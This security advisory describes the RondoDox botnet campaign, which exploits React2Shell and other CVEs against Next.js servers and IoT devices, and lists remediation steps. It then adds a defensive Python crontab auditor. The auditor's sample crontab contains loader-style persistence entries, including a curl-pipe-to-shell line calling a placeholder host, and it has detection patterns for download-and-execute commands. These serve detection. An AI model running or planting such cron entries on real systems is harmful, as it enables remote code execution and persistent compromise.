
RondoDox Botnet Weaponizes React2Shell to Infect IoT Devices and Web Apps

Severity

High

Analysis Summary

Cybersecurity researchers have uncovered a nine-month-long malicious campaign that has targeted Internet of Things (IoT) devices and web applications to build a botnet known as RondoDox. Active since early 2025, the campaign has steadily expanded in scale and sophistication, leveraging both newly disclosed and previously known vulnerabilities to compromise systems.

As of December 2025, attackers have been observed exploiting a critical vulnerability dubbed React2Shell (CVE-2025-55182) as a primary initial access vector. This flaw affects React Server Components (RSC) and Next.js, allowing unauthenticated remote code execution on vulnerable servers. According to the security firm, approximately 90,300 instances remain exposed worldwide, with the majority located in the United States, followed by Germany, France, and India.

RondoDox has incorporated multiple N-day vulnerabilities into its exploitation toolkit, including CVE-2023-1389 and CVE-2025-24893, to maximize infection opportunities. Prior abuse of React2Shell for botnet propagation was independently reported by multiple security researchers, reinforcing the credibility of the findings.

The campaign progressed through three distinct phases: initial reconnaissance and manual scanning (March–April 2025), daily mass vulnerability probing of web platforms such as WordPress, Drupal, Struts2, and IoT devices like Wavlink routers (April–June 2025), followed by hourly automated exploitation at scale from July through early December 2025.

In the December 2025 attacks, threat actors scanned for vulnerable Next.js servers and deployed multiple payloads, including cryptocurrency miners, a botnet loader and health-check component, and a Mirai-based botnet variant. One loader module aggressively removes competing malware, terminates non-whitelisted processes every 45 seconds, establishes persistence via cron jobs, and prevents reinfection by rival actors.

To mitigate risk, organizations are advised to promptly patch Next.js, segment IoT devices into isolated VLANs, deploy Web Application Firewalls (WAFs), monitor suspicious process activity, and block known command-and-control infrastructure.

Impact

  • Remote Code Execution
  • Unauthorized Access
  • Reconnaissance

Remediation

  • Patch Next.js and React Server Components to eliminate the React2Shell (CVE-2025-55182) remote code execution risk
  • Apply security updates for all affected N-day vulnerabilities (e.g., CVE-2023-1389, CVE-2025-24893) to reduce attack surface
  • Segment IoT devices into dedicated VLANs to limit lateral movement and botnet propagation
  • Deploy a Web Application Firewall (WAF) to block exploitation attempts against web applications
  • Restrict internet exposure of admin panels and development servers to reduce unauthenticated access
  • Monitor systems for suspicious process execution and unknown binaries (e.g., crypto miners and botnet loaders)
  • Detect and remove malicious cron jobs to prevent persistence mechanisms
  • Block known command-and-control (C2) infrastructure at network and firewall levels
  • Implement continuous vulnerability scanning to identify exposed and outdated services
  • Enable centralized logging and alerting to detect early signs of botnet activity
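The loader described in the analysis summary survives reboots through cron jobs, and the remediation list asks defenders to find and remove such entries. The script below is an added example, not Rewterz's code and not tooling from the advisory: it parses crontab text (per-user and system formats) and flags entries whose command runs from a world-writable or hidden path, pipes a download straight into a shell, or decodes base64 inline, noting when such an entry also runs on a very frequent schedule. The sample crontab, the placeholder host, and every heuristic rule are constructed assumptions for the demonstration, not indicators taken from the campaign.

```python
"""Audit crontab entries for loader-style persistence indicators.

Added example, not code from Rewterz or from the advisory. The sample
crontab and all rules below are constructed assumptions, not campaign IOCs.
"""
import glob
import re

# Constructed sample user crontab: one routine backup job plus three entries of
# the shape a loader drops to survive reboots (placeholder host, not a real IOC).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
* * * * * /tmp/.x/loader >/dev/null 2>&1
@reboot /dev/shm/.hc/health >/dev/null 2>&1
*/5 * * * * curl -s http://placeholder.invalid/i.sh | sh
"""

# Assumed heuristics over the command field; each hit becomes one reason.
RULES = [
    ("world-writable-dir", re.compile(r"(^|[\s'\"])(/tmp|/dev/shm|/var/tmp)/")),
    ("hidden-path",        re.compile(r"/\.[^/\s]+")),
    ("download-and-exec",  re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba)?sh\b")),
    ("base64-decode",      re.compile(r"\bbase64\s+(-d|--decode)\b")),
]
# Every minute, every 1-5 minutes, or at boot: the cadence of a health-check loop.
FREQUENT_SCHEDULE = re.compile(r"^(\*\s+\*\s+\*\s+\*\s+\*$|\*/[1-5]\s|@reboot)")

# Where cron entries live; system files carry a user field, per-user files do not.
CRON_LOCATIONS = [
    ("/etc/crontab", True),
    ("/etc/cron.d/*", True),
    ("/var/spool/cron/crontabs/*", False),   # Debian/Ubuntu per-user crontabs
    ("/var/spool/cron/*", False),            # RHEL-style per-user crontabs
]


def split_entry(line, system=False):
    """Return (schedule, command) for one crontab line, or None if it is not a job."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
        return None                       # blank, comment, or VAR=value line
    n_sched = 1 if line.startswith("@") else 5   # "@reboot" vs five time fields
    n_skip = n_sched + (1 if system else 0)      # skip the user field if present
    fields = line.split(None, n_skip)
    if len(fields) <= n_skip:
        return None
    return " ".join(fields[:n_sched]), fields[n_skip]


def audit_crontab(text, system=False):
    """Return [(entry, [reasons])] for every job line that matches a rule."""
    findings = []
    for raw in text.splitlines():
        parsed = split_entry(raw, system=system)
        if parsed is None:
            continue
        sched, cmd = parsed
        reasons = [name for name, rx in RULES if rx.search(cmd)]
        # A frequent schedule alone is normal; it only adds weight to another hit.
        if reasons and FREQUENT_SCHEDULE.match(sched):
            reasons.append("frequent-schedule")
        if reasons:
            findings.append((raw.strip(), reasons))
    return findings


def audit_system_cron(locations=CRON_LOCATIONS):
    """Walk the standard cron locations on this host and return {path: findings}."""
    report = {}
    for pattern, system in locations:
        for path in glob.glob(pattern):
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:               # unreadable file or a directory entry
                continue
            findings = audit_crontab(text, system=system)
            if findings:
                report[path] = findings
    return report


if __name__ == "__main__":
    print("Sample crontab:")
    for entry, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"  FLAG {', '.join(reasons)}: {entry}")
    print("This host:")
    for path, findings in audit_system_cron().items():
        for entry, reasons in findings:
            print(f"  {path}: {', '.join(reasons)}: {entry}")
```

Run as root so the per-user spool directories are readable; a hit is a prompt to inspect the referenced binary and its parent process, not proof of compromise, and legitimate jobs in `/tmp` or hidden directories will also be flagged.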